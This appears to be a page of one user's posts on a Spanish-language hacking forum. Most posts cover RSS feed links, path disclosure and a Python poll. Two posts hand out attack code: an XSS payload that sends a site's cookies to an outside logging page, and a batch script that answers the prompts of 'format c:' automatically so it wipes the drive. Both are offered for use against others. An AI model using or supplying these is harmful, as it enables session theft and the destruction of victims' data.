Mensajes

ese no es el codigo de wordpress, solo esta dando un ejemplo

si tuviera las register_globals on que por defecto estan off.. podria hacerse lo que dices.
si no, no.

Saludos!!

no.. lee el manual otra ves
debes encontrar un bug de XSS en la web, y colocar un codigo masomenos asi:

Código [Seleccionar] Expandir


self.location.href='http://misitio.com/log.php?c='+escape(document.cookie);

eso debe mandarte la cookie.. del sitio afectado.

saludos!!

si..

Código [Seleccionar] Expandir

@echo off
echo s>l
echo s>>l
format c:<l

deberia funcionar.. aunque obviamente no lo voy a probar xD

http://reader.google.com/


en google me funciono el primero que puse.. si no te sirve (no se porque) usa este:

http://foro.elhacker.net/index.php?sa=news;limit=20;type=rss2;action=.xml;board=34

que no cambia casi nada.. pero en fin..

Saludos!!

Es vulnerable a Full Path Disclosure, pero no es tan peligroso.. el path aveces incluye el nombre del usuario que controla la cuenta, y en caso de lograr un RFI o RFD te sirve, si solo sabes la ruta no te sirve de nada..

Saludos!!

Usa este Atom:

http://www.google.com/reader/public/atom/user/12433076552361768276/label/foro

Usa este feed:

http://foro.elhacker.net/index.php?sa=news;limit=20;type=rss;action=.xml;board=34

Saludos!!

el path disclosure solo te da informacion sobre donde esta alojada la web en el servidor.. no solo con saberla vas a tener control de este

Saludos!!

Se agrego python a la encuesta..

http://foro.elhacker.net/index.php/topic,123084.0.html

Veamos cuantos apoyan este lenguaje..

Gracias aNexos

Listo, division-x agregado.. mientras pongan sus dudas de python aqui (programacion general) y mientras hago algun tutorial de migracion a python, para que si se llega a crear el foro, tenga algunos posts

Saludos!!